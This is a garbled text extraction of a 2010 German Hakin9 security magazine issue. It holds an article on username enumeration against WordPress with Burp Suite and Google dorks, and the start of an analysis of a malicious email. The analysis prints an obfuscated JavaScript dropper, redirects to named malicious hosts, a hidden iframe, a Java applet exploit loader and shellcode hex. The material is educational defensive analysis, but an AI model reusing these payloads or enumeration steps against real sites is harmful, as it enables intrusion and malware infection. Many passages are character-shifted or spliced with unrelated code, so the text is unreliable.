Sie sind auf Seite 1von 50

LIEBE HAKIN9 LESER,

as Hauptthema dieser Ausgabe von Hakin9 ist Penetration Testing. Im Jahr


D 2010 ist es kein Problem mehr, ein Netzwerk vor Gefahren zu schützen. Ist
es wirklich so?
Darüber erfahren Sie aus dem Artikel von Dimitri Roschkowski “Penetration
7HVWLQJLP-DKUH³GHULQGHUQHXHQ5XEULN3UD[LV]X¿QGHQLVW
Besonders in diesem Jahr steigt die Anzahl der E-Mails die ohne Zutun
GHV $QZHQGHUV RGHU QXU PLW VHKU ZHQLJ (LQÀXVVQDKPH GHV $QZHQGHUV
Schadsoftware installieren. Das eleven Research-Team hat ein Beispiel näher
XQWHUVXFKW(UJHEQLVVHGLHVHU8QWHUVXFKXQJ¿QGHQ6LHLP$UWLNHOYRQ0LFKDHO
Peick “Malware-Doppelschlag per JavaScript und JavaApplet“ in der Rubrik
Fortgeschrittene.
In der letzten Ausgabe hat Andreas Lentwojt ausführlich die Norm ISO/IEC
27001 vorgestellt und einen kurzen Einblick in die 27000-Familie gegeben. Ein
Teil dieser Familie ist die ISO 27005, die sich mit dem IT-Risikomanagement
befasst. In der heutigen Ausgabe wird der Autor in dem Artikel “IT-
Risikomanagement – Wozu brauche ich das?“ darstellen, warum es nützlich
ist, sich mit dem Risikomanagement der IT zu beschäftigen und dabei auf das
Modell der ISO 27005 zurück zu greifen. Auf dieses Thema wurde bereits in
einer früheren Ausgabe eingegangen, in diesem Artikel wird aber mehr auf die
Norm und den eigentlichen Prozess mit den einzelnen Schritten eingegangen.
Heutzutage sind wir überall von Computern umgeben. In der IT-Branche
herrscht trotzdem ein Frauenmangel. Warum ist es so? Woraus resultieren die
Vorurteile gegen die Frauen, die sich mit Computern beschäftigen? Wie sieht
die Situation von Frauen in der IT-Branche aus?
Auf diese und viele andere Fragen antwortet unsere Gesprächspartnerin
Ulrike Peter im Interview „Erfolgreiche Frauen in der IT-Branche - ein
Erfahrungsbericht“, das in dieser Ausgabe von Hakin9 besonders zu empfehlen
ist.
Sie möchten unser Heft jeden Monat automatisch bekommen? Nichts ein-
facher als dies. Registrieren Sie sich für unseren Newsletter auf www.hakin9.org/
de und Sie werden regelmäßig jede Hakin9 Ausgabe in Ihrem E-Mail-Account
YRU¿QGHQ -HGH $XVJDEH ZLU QlPOLFK DXWRPDWLVFK DQ XQVHUH 6XEVFULEHU YHU
schickt.
Ich hoffe, dass wir mir dieser Ausgabe Ihren Herausforderungen gewachsen
sind.

Viel Spaß beim Lesen!


,ORQD3U]\E\VáDZVND

5/2009 HAKIN9 4
10/2010

INHALTSVERZEICHNIS

FÜR EINSTEIGER FORTGESCHRITTENE


06 User Enumeration bei Web-Applikationen 11 Malware-Doppelschlag per JavaScript und
Kai Renz JavaApplet
Wo der normale Benutzer nicht hin soll, wo wichtige Michael Peick
Daten nur für einen kleinen Kreis an Personen zugäng- Besonders in diesem Jahr steigt die Anzahl der E-Mails
lich sein sollen, wo administrative Aufgaben erledigt die ohne Zutun des Anwenders oder nur mit sehr we-
werden - überall dort werden Authentifizierungen ein- nig Einflussnahme des Anwenders Schadsoftware ins-
gesetzt. tallieren. Das eleven Research-Team hat ein Beispiel
näher untersucht.

PRAXIS
17 Penetration Testing im Jahre 2010
Dimitri Roschkowski
Viele Administratoren übersehen leider bei der Absi-
cherung des Netzwerkes seine physikalische Sicher-
heit. Die Bedrohung kommt nicht nur durch das Ether-
net-Kabel.

ABWEHR
25 OCTAVE – Hier macht das Risiko die Musik
Helmut Kaufmann
Die überwiegende Mehrheit von Unternehmen sind
nach regulativen Vorgaben wie z.B. Basel II, Solvency
II, SOX, 8. EU Auditrichtlinie oder SAS 70 angehalten
ein nachhaltiges und nachvollziehbares Risikomanage-
ment und Business Continuity Planning zu implemen-
tieren.

Umschlagsentwurf: 3U]HP\VáDZ%DQDVLHZLF] Anmerkung!


Werbung: adv@software.com.pl Die in der Zeitschrift demonstrierten Techniken
herausgegeben vom Verlag: sind AUSSCHLIEßLICH in eigenen Rechner-
Software Press Sp. z o. o. SK Anschrift: netzen zu testen! Die Redaktion übernimmt
Software Press Sp. z o.o. SK keine Haftung für eventuelle Schäden oder
Geschäftsführer: 3DZHá0DUFLQLDN ul. Bokserska 1, 02-682 Warszawa, Poland Konsequenzen, die aus der unangemessenen
Tel. +48 22 427 36 56, Fax +48 22 244 24 59 Anwendung der beschriebenen Techniken
Managing Director: (ZDàR]RZLFND www.hakin9.org/de entstehen. Die Anwendung der dargestellten
ewa.lozowicka@software.com.pl Techniken kann auch zum Datenverlust führen!
Die Redaktion bemüht sich, dafür Sorge zu hakin9 erscheint in folgenden Sprachversionen
Chefredakteurin:,ORQD3U]\E\VáDZVND tragen, dass die in der Zeitschrift sowie auf und Ländern: deutsche Version (Deutschland,
ilona.przybyslawska@software.com.pl den begleitenden Datenträgern erhaltenen Schweiz, Österreich, Luxemburg), französische
Informationen und Anwendungen zutreffend Version (Frankreich, Kanada, Belgien, Marok-
Redaktion/Betatester: Kai Renz, Michael und funktionsfähig sind, übernimmt jedoch ko), spanische Version (Spanien, Portugal),
Peick, Dimitri Roschkowski, Helmut Kauf- keinerlei Gewähr für derer Geeignetheit für polnische Version (Polen), englische Version
mann, Andreas Lentwojt, Patrick Schmid, bestimmte Verwendungszwecke. Alle Mar- (Kanada, USA)
Tobias Glemser, Ulrike Peter, Nicole Huck, kenzeichen, Logos und Handelsmarken, die
Michael Schratt sich in der Zeitschrift befinden, sind regist-
rierte oder nicht-registrierte Markenzeichen
Produktion: Andrzej Kuca der jeweiligen Eigenümer und dienen nur als
DTP: 3U]HP\VáDZ%DQDVLHZLF] inhaltliche Ergänzungen.

4 6/2010
InhaltsverzeIchnIs

30 IT-Risikomanagement – Wozu brauche ich


das?
Andreas Lentwojt
In der letzen Ausgabe habe ich Ihnen ausführlich die
Norm ISO/IEC 27001 vorgestellt und einen kurzen Ein-
blick in die 27000-Familie gegeben. Ein Teil dieser Fa-
milie ist die ISO 27005, die sich mit dem IT-Risikoma-
nagement befasst.

ANGRIFF
37 DNS Cache Poisoning
Patrick Schmid
Als Ergänzung zu meinem ersten Artikel Java Applet
Attacke erfahren wir hier, wie wir ein Opfer mittels DNS
Spoofing unbemerkt eine präparierte Seite unterschie-
ben können.

INTERVIEW
41 Interview mit Tobias Glemser
„Sicherheit darf nicht erst am Ende von neuen Anwen-
dungen, Produkten oder Projekten als Kontrollinstru- 44 Interview mit Ulrike Peter
ment einbezogen, sondern muss als integraler und vor „Die IT ist (und bleibt es sicher auch) eine Männerdo-
Allem unterstützender Bestandteil eines erfolgreichen mäne – Frauen in der IT-Branche sind Paradiesvögel.“
Produkts gesehen werden.“ Mehr erfahren Sie aus dem Interview mit Ulrike Peter –
Mehr erfahren Sie aus dem Interview mit Tobias Glem- freie Journalistin und seit zehn Jahren für unterschiedli-
ser – leitender IT-Sicherheitsberater bei der Tele-Con- che Unternehmen und Medien in der IT-Branche tätige
sulting security networking training GmbH in Gäufelden PR-Spezialistin.
bei Stuttgart und verantwortlich für den Geschäftsbe-
reich Penetrationstests.
REZENSIONEN
46 SAP for DFPS Implementierung und Custo-
mizing
Nicole Huck
Das Buch SAP for DFPS Implementierung und Cus-
tomizing, basiert auf mehr als 20 Jahren Erfahrung,
die die Autoren insgesamt bei der Entwicklung, Imple-
mentierung, aber auch Schulung der Lösung sammeln
konnten.

Im Zusammenhang mit den Änderungen, die in letzter Zeit in dem


deutschen Recht stattgefunden haben und die IT-Sicherheit be-
treffen, möchten wir ankündigen, dass hakin9-Abwehrmethoden
Magazin seinem Profil treu bleibt.
Unser Magazin dient ausschließlich den Erkenntniszwecken.
Alle im Magazin präsentierten Methoden sollen für eine sichere IT
fungieren. Wir legen einen großen Wert auf die Entwicklung von
einem sicheren elektronischen Umsatz im Internet und der Be-
kämpfung von IT Kriminalität.

hakin9.org/de 5
FÜR EINSTEIGER

User Enumeration bei


Web-Applikationen
Kai Renz

Wo der normale Benutzer nicht hin soll, wo wichtige Daten nur


für einen kleinen Kreis an Personen zugänglich sein sollen, wo
administrative Aufgaben erledigt werden - überall dort werden
Authentifizierungen eingesetz.

IN DIESEM ARTIKEL ERFAHREN SIE... WAS SIE VORHER WISSEN/KÖNNEN SOLLTEN...


t "VGXFMDIFS8FJTF8FC"QQMJLBUJPOFOTFOTJCMF*OGPSNBUJPOFO t (SVOEXJTTFO8FC"QQMJLBUJPOFOVOEEFSFO'VOLUJPOTXFJTF
QSFJTHFCFO t (SVOEXJTTFO'VOLUJPOTXFJ•F#VSQTVJUF
t 8JF 4JF 6TFS &OVNFSBUJPO CFJ 8FC"QQMJLBUJPOFO EVSDIGàI-
ren
t 8JF EJF HFXPOOFOFO *OGPSNBUJPOFO XFJUFS WFSXFOEFU XFS-
den

as Problem mit solchen Authentifizierung ist,

D
dem Ausland – dafür sind diese Plattformen ja schließ-
dass sie nur maximal so sicher sind, wie ihr lich auch bestens geeignet. Doch was, wenn jemand ihr
schwächstes Glied. Durch das Web 2.0 wird im- Konto übernimmt und unter Ihrem Namen dort Humbug
mer mehr auf Komfort und Benutzerfreundlichkeit ge- treibt? Stellen Sie dies nicht sofort fest, so kann diese
setzt, wodurch einfache Sicherheitsmechanismen ihre Internetplattform schnell zu einem sehr großen Problem
Wirkung verfehlen. Bruteforce Angriffe galten durch werden. Schon bei der Anmeldung bei diesen Seiten le-
die schier unendlichen Kombinationsmöglichkeiten als gen wir unsere wichtigen Daten in die Hände der Betrei-
„nicht mehr praktikabel“. Viele Seiten erlauben es uns ber, ohne das uns eigentlich wirklich interessiert, wofür
aber, die Anzahl an Versuchen drastisch einzuschrän- diese weiter verwendet werden. Erst wenn mal wirklich
ken, da sie Informationen preisgeben, die einen Angriff ein großer Skandal an die Oberfläche dringt, herrscht
oftmals bedeutend einfacher machen. Empörung und die allgemeine „ich hab‘s doch gesagt“-
Wenn Sie sich heute im Internet herumtreiben, finden Stimmung kommt auf. Bei Spammern und Crackern
Sie sich zwischen Social Networks, Auktionsplattfor- sind Accounts zu Auktionsplattformen, Email-Konten
men und Tauschbörsen wieder. Identitäten werden im und Social Networks sehr beliebt da viele Benutzer für
Netz frei und für jedermann zugänglich eingestellt, und mehrere Zugänge das selbe Passwort verwenden und
manch einem kommt es vor, wie wenn er durch Twit- so zum Beispiel durch den eBay-Account auf Rechnung
ter und Co. mehr über seinen Nachbarn wüsste, wie des Opfers eingekauft werden kann. Ein Benutzer kann
über seinen langjährigen Freund. Obwohl viele immer hier nur wenige, trotzdem aber effektive Maßnahmen
noch der Ansicht sind, sich frei und anonym im Internet ergreifen. Ein sicheres Passwort zu wählen ist der erste
bewegen zu können, so stellen sie doch Details über und wichtigste Schritt, wobei immer mehr Passwörter
ihr Leben jedem frei zur Verfügung. Sie denken ein frei über nicht-verschlüsselte Verbindungen und Keylogger
erfundener Benutzername halte die meisten davon ab abgefangen werden und somit auch das sicherste Pass-
ihre wahre Identität herauszufinden? Lassen Sie sich wort nutzlos ist. Ein zweiter Schritt wäre verschiedene
gesagt sein das dies ein Irrtum ist – ein sehr großer Irr- Passwörter für die unterschiedlichen Seiten zu verwen-
tum! Die Gefahr, die all dies mit sich bringt, ist leicht zur den und diese regelmäßig zu erneuern. Dieser Schritt
erklären: Stellen Sie sich vor, sie arbeiten in einem gro- wird aber leider nur sehr selten wirklich umgesetzt, da
ßen Telekommunikationsunternehmen. Über Facebook er mit grossem Aufwand verbunden ist und die meisten
und Xing halten Sie gerne Kontakt mit Kollegen aus Benutzer keine Lust haben sich mehrere verschiedene

6 9/2010
User Enumeration bei Web-Applikationen

Passwörter zu merken. Oftmals werden zwar viele ver- anders vorgehen: er überprüft den Login-Mechanismus
schiedene Zugangsdaten verwendet, durch das häufige auf Ausgaben, welche den Benutzernamen verraten
wechseln, werden dann aber eher einfache Passwörter oder Hinweise darauf geben könnten ob der zum Test
verwendet, damit der Benutzer sich diese leicht merken angegebene Name ein wahrer Benutzername ist. Hin-
kann. weise darauf geben Rückgaben wie „Das für diesen Be-
Um einen Zugang zum Benutzerkonto des Anwen- nutzernamen angegebene Passwort ist nicht korrekt!“
ders zu bekommen, sind meist ein Benutzername und oder ähnliches. Gegengeprüft werden kann dies durch
ein Passwort nötig. Oftmals fangen hier schon die Pro- die Eingabe eines fiktiven Benutzers. Variiert die Aus-
bleme an. Hat der Angreifer herausgefunden, dass sich gabe von der obigen so ist es sehr wahrscheinlich dass
die Benutzer durch eine Email-Passwort-Kombination der zuvor verwendete Name korrekt war.
anmelden können, muss er schon mal viel weniger Zeit Ein weiterer Angriffsvektor ist die „Passwort-verges-
investieren, den Benutzernamen herauszufinden, was sen-Funktion“. Ist solch eine Funktion schlecht ge-
bei einem Bruteforce-Angriff ein Zeitvorteil sein, wel- schrieben, oder ist diese einfach nur zu leichtsinnig
cher zwischen durchführbar und nicht durchführbar, al- dem Benutzer Komfortfunktionen anzubieten, können
so Erfolg und Misserfolg entscheidet. Oftmals reicht al- für den Angreifer wichtige Informationen preisgeben
so schon eine simple Registrierung bei einer Zielseite werden. Eine Fehlkonfiguration, bzw. leichtsinnige Web
um die Feinheiten einer Anmeldefunktion herauszufin- 2.0 Funktion, wie die eben angesprochene, kann zum
den und auszunutzen. Kann ein Benutzer seinen Nick- Beispiel bei Eingabe der Mailadresse auf der Passwort-
namen frei wählen, so sind die Möglichkeiten bei einem Vergessen-Seite mit einem Satz wie „Eine Email mit
Bruteforce-Angriff wieder immens, sodass der Angrei- Ihrem neuen Passwort für den Benutzeraccount <na-
fer eine andere Taktik wählen muss. Er wird versuchen me> wurde erfolgreich an Sie zugestellt“ antworten,
ohne mühsames Durchprobieren von Kombinationen wodurch der wahre Benutzer zwar eine Email, der An-
an den Benutzernamen zu kommen oder einen ande- greifer jedoch auch den Benutzernamen erhält. Ist die
ren Schwachpunkt im System ausnutzen. In diesem angegebene Sicherheitsadresse inaktiv oder wird nur
Artikel werde ich ein paar einfache Möglichkeiten dar- sporadisch verwendet, so geht diese Email leicht un-
stellen um einer Web-Applikation Benutzernamen zu ter und der Angreifer kann mit seiner Arbeit fortfahren.
entlocken (User Enumeration) und diese automatisch Ein gutes Beispiel hierfür ist Wordpress. Auch in seiner
aufzunehmen. neuesten Version kann über die „Passwort-vergessen-
Wie bereits oben beschrieben kann sich der Angrei- Funktion“ der Benutzername herausgefunden werden.
fer, sofern er dazu berechtigt ist, zuerst ein Bild vom Re- Ein sogenannter Bot-Schutz ist nicht vorhanden, so-
gistrierungs- bzw. Login-Mechanismus machen. Findet dass wir das ganze mit einem Webproxy, in unserem
er beispielsweiße heraus dass der Benutzername eine Fall Burpsuite, automatisieren können.
Mailadresse ist, so kann er leicht Suchmaschinen oder Durch eine lokale Recherche an einem Wordpress
Social Networks verwenden, um diese herauszufinden. haben wir herausgefunden, dass beim Eingeben eines
Werden frei wählbare Benutzernamen verwendet, so falschen Benutzernamens ein Fehler zurückgegeben
fällt diese Art von Recherche weitestgehend aus, wo- wird: ERROR: Invalid username or e-mail. Verwenden
bei natürlich auch hier manchmal ein Glückstreffer da- wir jedoch den richtigen Benutzernamen erhalten wir
bei sein kann. In so einem Fall wird der Angreifer aber ein: Check your e-mail for the confirmation link.

Request Response

Benutzername: 1a2a3d4f Benutzer oder Passwort falsch


Passwort: sosecret

Benutzername: foobar Falsches Passwort


Passwort: sosecret

Bruteforce

Benutzername: foobar Login erforgreich!


Passwort: topsecret

Abbildung 1. Funktionsweiße einfache User Enumeration

hakin9.org/de 7
FÜR EINSTEIGER

Nun müssen wir uns genauer ansehen was zwischen POST-Anfrage und deren Antwort von Burpsuite aufge-
unserem Client und dem Webserver kommuniziert wird. zeichnet werden. Dort können wir unter request -> pa-
Hierfür starten wir Burpsuite und konfigurieren unseren rams unsere gerade eingegebenen und noch weitere
Browser so dass er als Proxy localhost auf Port 8080 Daten betrachten (Abbildung 2).
verwendet. Als nächstes wechseln wir in den Proxy-Tab Als nächstes senden wir den Request per Rechts-
und setzen Intercept auf Off. Durch das Deaktivieren klick an den Intruder. Das Target-Tab lassen wir unbe-
dieser Funktion verhindern wir, das uns Burpuite bei rührt, wir werden erst bei den Positions-Optionen aktiv.
jedem Schritt frägt, ob wir die Daten wirklich zu unse- Wir klicken rechts auf „clear $“. Als Attacke verwenden
rem Webserver senden wollen. Als nächstes besuchen wir Sniper. Ganz unten im Textfeld sehen wir eine Zeile
wird unsere Zielseite. Wordpress verwendet immer mit „user_login“. Dies sind die Parameter die per POST
das gleiche Schema: http://www.zielseite.de/wp-login. übergeben werden. Ich markiere den zum Test einge-
php?action=lostpassword. Wir geben absichtlich ei- gebenen Benutzername und klicke auf „add $“ (Abbil-
nen falschen Benutzernamen an und verfolgen wie die dung 3).

Abbildung 2. Unser POST-Request an Wordpress

Abbildung 3. Der Parameter der verändert werden soll wird markiert

8 9/2010
User Enumeration bei Web-Applikationen

Abbildung 4. Burpsuite Intruder hat zwei Benutzer identifizieren können

Nun müssen wir noch unser Payload konfigurieren. Hier funktioniert dies auch mit Registrierungssystemen die
verwenden wir „Payload Set 1, present list“. Man kann nun angeben ob ein Benutzername schon vergeben ist. Den
optional eine ganze Liste mit Benutzernamen laden, oder Möglichkeiten sind hier nur durch die eigene Kreativi-
einfach per Hand einige eintragen. Nun müssen wir noch tät Grenzen gesetzt. Mit dieser simplen Methode gelingt
unterscheiden lassen wann ein Benutzer gefunden wur- es einem Angreifer automatisiert Benutzernamen zu fin-
de und wann nicht. Dazu gehen wir in den Option-Tab und den – doch was kann noch passieren?
scrollen zu grep. Wir aktivieren die Checkboxen bei „search Eine oft übersehene Tatsache ist dass das Problem
responses for these expressions“ und „simple pattern oft vor der Tastatur sitzt. Sprich, der Admin hat etwas
match“. Außerdem drücken wir auf clear. Die voreingestell- falsch konfiguriert. So kann es vorkommen dass gan-
ten Pattern brauchen wir nicht zu verwenden. Wir wissen ze Mitgliederlisten in Foren öffentlich zugänglich sind
dass bei Eingabe eines existierenden Benutzernamens ein oder im Cache von Suchmaschinen gefunden werden
„Check your e-mail for the confirmation link“ zurückgeliefert können. Durch Suchmaschinen wie Google lassen sich
wird. Also tragen wir genau diesen Satz ein und klicken auf solche falsch konfigurierten Seiten leicht auffinden. Ei-
add. Nun geben wir noch an, dass wird redirects folgen wol- ne kleine Liste an Google Dorks ist in Listing 1 angege-
len. Damit haben wir alles nötige konfiguriert. Wir klicken ben. Eine weitere Möglichkeit Benutzernamen zu identi-
in der Menuleiste auf intruder -> start attack. Nach einer fizieren sind URLs. Twitter ist hier ein schönes Beispiel.
kurzen Zeit erhalten wir erste Ergebnisse - der Intruder hat Jeder Benutzer kann sich unter twitter.com/benutzerna-
zwei Benutzer identifiziert (Abbildung 3)! Eine gute Wörter- me austoben. Dies stellt eine weitere Möglichkeit dar
liste erhöht die Effizient natürlich deutlich! automatisch Namen zu entlarven. Wie bereits erwähnt
Somit konnten wir leicht über die Passwort-Verges- gibt es unzählige Möglichkeiten User Enumeration zu
sen Funktion automatisiert Benutzer erfassen. Natürlich betreiben wodurch Bruteforce eine nicht zu unterschät-
zende Möglichkeit bleibt.
Listing 1. Google Dorks

inurl:memberlist.php "Powered by phpBB"


¿OHW\SH:php "memberlist" KAI RENZ
¿OHW\SH:txt "memberlist" Der Autor befindet sich gerade in Ausbildung zum Fachinfor-
¿OHW\SH:txt "usernames" matiker für Systemintegration. In seiner Freizeit beschäftigt
¿OHW\SH:sql "users" er sich mit Themen rund um IT-Sicherheit und Penetration Tes-
ting.
Kontakt mit dem Autor: kai.renz@proof-of-concept.org

hakin9.org/de 9
2010
www.sigs-datacom.de

Kontakt: Anja Keß, · Lindlaustraße 2c, D-53842 Troisdorf,


Tel.: +49 (0) 22 41 / 23 41-201 · Fax: +49 (0) 22 41 / 23 41-199 · Email: anja.kess@sigs-datacom.de

Erfolgreich durch Wissensvermittlung aus 1. Hand


Q Die ultimative Hacking-Akademie Q NEU – jetzt 3-tägig:
Q Erfolgreiche Abwehr von Hacker-Angriffen und CSM Certified ScrumMaster Course
sicherer Schutz Ihres Netzwerks Q Voraussetzung für die Zertifizierung zum Scrum Master
Klaus Dieter Wolfinger Sabine Canditt
20. – 22. September 2010 25. – 27. Oktober 2010, München
03. – 05. November 2010, Frankf./M. 2.150,- € zzgl. MwSt. 07. – 09. Dezember 2010, München 2.150,- € zzgl. MwSt.

Q Best Practices für sichere Web-Anwendungen Q Secure Coding mit Java EE


Q Sicherheitslücken in Webanwendungen vermeiden, Q Entwicklung einbruchssicherer Webanwendungen
erkennen und schließen – gemäß Empfehlung des BSI und Webservices unter Java EE
Thomas Schreiber Mirko Richter
25. – 26. Oktober 2010, Düsseldorf 26. – 27. Oktober 2010,
08. – 09. Dezember 2010, München 1.590,- € zzgl. MwSt. 06. – 07. Dezember 2010, München 1.590,- € zzgl. MwSt.

Q Sicherheit mit WebService-Infrastrukturen Q Web Application Firewall Starter


Jörg Bartholdt Q Essentielles Web Application Firewall Grundwissen
25. – 26. Oktober 2010, Achim Hoffmann
22. – 23. November 2010, München 1.590,- € zzgl. MwSt. 17. November 2010, München 990,- € zzgl. MwSt.

Q Cloud Computing im praktischen Einsatz Q Advanced Web Application Security Testing


Arnd Kleinbeck & Stefan Tilkov Q Professionelle Sicherheitsuntersuchungen von
24. Oktober 2010, München Enterprise-Webanwendungen durchführen
10. Dezember 2010, Köln 990,- € zzgl. MwSt. Thomas Schreiber
01. – 02. Dezember 2010, München 1.590,- € zzgl. MwSt.
Q iPhone Grundlagen und Entwicklung
Hendrik Schreiber
11. – 12. Oktober 2010, Köln
11. – 12. Dezember 2010, Köln 1.590,- € zzgl. MwSt.

www.sigs-datacom.de www.sigs-datacom.de
Malware-Doppelschlag per JavaScript und JavaApplet

Malware-Doppelschlag per
JavaScript und JavaApplet
Automatischer Download durch JavaScript und
Ausbruch aus der Virtuellen Java Umgebung
Michael Peick
Besonders in diesem Jahr steigt die Anzahl der E-Mails
die ohne Zutun des Anwenders oder nur mit sehr wenig
Einflussnahme des Anwenders Schadsoftware installieren.
Das eleven Research-Team hat ein Beispiel näher untersucht.

IN DIESEM ARTIKEL ERFAHREN SIE... WAS SIE VORHER WISSEN/KÖNNEN SOLLTEN...


t XJF4DIBETPGUXBSFàCFSBLUVFMMF4JDIFSIFJUTMàDLFOWFSCSFJUFU t 'VOLUJPOTXFJTF WPO +BWB"QQMFUT VOE (SVOEMBHFO WPO +BWB-
wird. Script und HTML.

s handelt sich dabei um eine E-Mail die massen-

E
Wird die Datei "39035xls.html" im Anhang im Brow-
haft versandt wird und eine Website/HTML-Datei ser aufgerufen, dann wird der Nutzer mittels des Ja-
als Anhang enthält. Die E-Mail hat eine unver- vaScripts an eine bestimmte Internetseite weitergeleitet,
fängliche Betreffzeile wie „Re: Vacation“ oder „Ran- die Schadcode enthält. Schreibt man das JavaScript-
dolph Plans“ und einen ebenfalls unverdächtigen Text Codefragment leserlicher, dann sieht man, dass eine
wie beispielsweise: Weiterleitung zur Seite "http://numerouno-india.com/x.
„Thank you very much for meeting with me on Satur- html" führt1 (vgl. Listing 2.).
day. Attached are the plans for the Randolph Street De- Auf der weitergeleiteten WebSite sieht man eine
velopment project we discussed. If you have any ques- weitere Weiterleitung an die URL "http://scaner-g.
tions please don't hesitate to contact me. cz.cc/scanner10/?afid=24". Interessant ist hier nicht
Thanks again.“ die Weiterleitung an eine weitere Seite, sondern die
Im HTML-Anhang befindet sich ein eingebetteter Tatsache, dass ein unsichtbares iFrame mit Brei-
JavaScript Code. Um die Erkennung des JavaScript te 0 Pixel und Höhe 0 Pixel geladen wird. Schauen
Codes zu erschweren, wurde er verschleiert/unleserlich wir uns die dahinterliegende Seite "http://arestyute.
gemacht, in der Fachsprache auch als Obfuscation be- com/sadhbdsa879321jbdas/index.php" etwas ge-
zeichnet (vgl. Listing 1.). nauer an (vgl. Listing 3.).

Listing 1. Die Datei "39035xls.html":

<script language="JavaScript" type="text/javascript">function etgr(zj4r){var\nbo97,bvgy="",kpn8,iyv2="0ocdfu


m;ip/qrlx=nt.-:v he>s"a<",p3je,j446=iyv2.length;eval(unescape("%66un%63ti%6Fn r%61iy%28ku
%79c){%62vg%79+=%6Buyc%7D"));for(p3je=0;p3je<zj4r.length;p3je++){bo97=zj4r.charAt(p3je);k
pn8=iyv2.indexOf(bo97);if(kpn8>-1){kpn8-=(p3je+1)%j446;if(kpn8<0){kpn8+=j446;}raiy(iyv2.
charAt(kpn8));}else{raiy(bo97);}}eval(unescape("%64oc%75me%6Et.w%72it%65(b%76gy)%3Bbv%67y
=%22%22;"));}etgr("0i"vda0>s-0me-h;c=ox>ft:.h-00n.s-v:d;=x e"moc>;a<msatmsol<.ituqchiix-
e<u0:alpaxr");</script><noscript>To display this page you need a browser that supports
JavaScript.</noscript>

hakin9.org/de 11
FORTGESCHRITTENE

Hier ist ein Java-Applet eingebettet, welches beim Version ein bestimmter Codeblock angesprungen, wel-
Aufruf der Seite von der Java-Virtual-Machine ausge- cher eine Schwachstelle in der JVM ausnutzt, wodurch
führt wird, sofern diese im Browser installiert und akti- ein Jailbreak ermöglicht wird. Ursprünglich sollen Ja-
viert ist. Ein weiterer verschleierter JavaScript-Code fin- va-Anwendungen in einer Art sicheren Sandbox lau-
det sich ebenfalls. fen und keinen Schaden im Computer anrichten2. Die-
Zunächst analysieren wir das Java-Applet "tmp/des. se Barriere ist in unserem Beispiel durchbrochen. In
jar". In der Datei befinden sich drei Java-Klassen von dem Codefragment unten (vgl. Listing 4a, 4b), betrifft
denen eine Namens dev.s.AdgredY als Einsprungs- die ausgenutzte Schwachstelle vor allem die Java Ver-
punkt für das Applet dient. Mit einem Java-Decompiler sion bis einschließlich 1.6.0_16. Unter "http://vreugden-
kann man die Klassen, welche momentan in Java-Byte- hilresearch.nl/2010/05/java-midi-parse-vulnerabilities/"
code vorliegen, in leserlichen Java-Quelltext überfüh- kann jeder Interessierte detaillierte Informationen zur
ren. Dies entspricht nicht ganz dem originalem Quell- verwendeten Schwachstelle erhalten. Ausgangspunkt
text, kommt ihm aber recht nahe. Wir benutzen dafür ist ein Fehler in der Verarbeitung von URLs im einge-
den Decompiler von http://java.decompiler.free.fr/. bauten Midiplayer von Java.
Schaut man sich nun den Java-Quelltext an, stellt man Beim Ausnutzen der Schwachstelle wird der Shell-
fest, dass keine Obfuscation für Java, wie z.B. das un- code ausgeführt, welcher nun vollen Zugriff auf das
ter der GPL 2+ stehende ProGuard, benutzt wurden. System hat und Schadsoftware mitsamt Trojaner von
Was zu erwarten gewesen wäre, um die Erkennung zu der externen Quelle (URL) nachladen kann.
erschweren. Sollte der Benutzer eine ältere Java Version instal-
Nach einer Verifikation der als Parameter übergebe- liert haben, so wird eine andere Codepassage ange-
nen URL "http://arestyute.com/sadhbdsa879321jbdas/l. sprungen, die Schwachstellen älterer Java Versionen
php?deserialize=6e&i=1" wird abhängig von der Java- ausnutzt.

Listing 2. Weiterleitung an eine weitere Seite raiy(iyv2.charAt(kpn8));


} else {
function etgr(zj4r) { raiy(bo97);
var }
}
bo97, bvgy = "", /* document.write(bvgy);bvgy=""; */
kpn8, iyv2 = "0ocdfum;ip/qrlx=nt.-:v he>s"a<", eval(unescape("%64oc%75me%6Et.w%72it%65(b%76gy)%3Bbv%
p3je, j446 = iyv2.length; 67y=%22%22;"));
/* function raiy(kuyc){bvgy+=kuyc} */ }
eval(unescape("%66un%63ti%6Fn r%61iy%28ku%79c)
{%62vg%79+=%6Buyc%7D")); /* document.write('<meta http-equiv="refresh"
for (p3je = 0; p3je < zj4r.length; p3je++) { content="0;url=http://numerouno-
bo97 = zj4r.charAt(p3je); india.com/x.html" />');
kpn8 = iyv2.indexOf(bo97); etgr("0i"vda0>s-0me-h;c=ox>ft:.h-00n.s-v:d;=x
if (kpn8 > -1) {function etgr(zj4r) { e"moc>;a<msatmsol<.ituqchiix-
var e<u0:alpaxr");
if ('this_is' == /an_example/) {
bo97, bvgy = "", do_something();
kpn8, iyv2 = "0ocdfum;ip/qrlx=nt.-:v he>s"a<", } else {
p3je, j446 = iyv2.length; var a = b ? (c % d) : e[f];
/* function raiy(kuyc){bvgy+=kuyc} */ }
eval(unescape("%66un%63ti%6Fn r%61iy%28ku%79c)
{%62vg%79+=%6Buyc%7D"));
for (p3je = 0; p3je < zj4r.length; p3je++) { PLEASE WAITING.... 4 SECONDS
bo97 = zj4r.charAt(p3je); <meta http-equiv="refresh" content="4;url=http://
kpn8 = iyv2.indexOf(bo97); VFDQHUJF]FFVFDQQHU"D¿G 
if (kpn8 > -1) {+ />
kpn8 -= (p3je + 1) % j446; <iframe width="0" height="0" src="http://arestyute.
if (kpn8 < 0) { com/sadhbdsa879321jbdas/index.
kpn8 += j446; php"></iframe>
}

12 10/2010
Malware-Doppelschlag per JavaScript und JavaApplet

Listing 3. Seite „http://arestyute.com/sadhbdsa879321jbdas/


index.php” (gekürztes HTML Dokument): 5560100006A006A0089EA81C25E0100005289EA81C278020000526
A00FFD06A0589EA81C25E01000052FF955
<body id='greldm2'> A01000089EA81C25E01000052688000000
<applet archive='tmp/des.jar' code='dev.s.AdgredY' 0FF954E01000089EA81C25E01000031F60
width='462' height='255'> 1C28A9C356E02000080FB007406881C324
<param name='data' VALUE='http://arestyute. 6EBEEC604320089EA81C24502000052FF9
com/sadhbdsa879321jbdas/l. 55201000089EA81C2500200005250FF955
php?deserialize=6e&i=1'/> 60100006A006A0089EA81C25E010000528
<param name='cc' value='1'/> 9EA81C2A6020000526A00FFD06
</applet> A0589EA81C25E01000052FF955A0100009D5D5F5E5A595B58C3000
</body> 0000000000000000000000000000047657
<script>var cmjve3="d.<i'<ih''=A2F40Jy=s'o##ayQ'a'Ua'b0 454656D705061746841004C6F61644C696
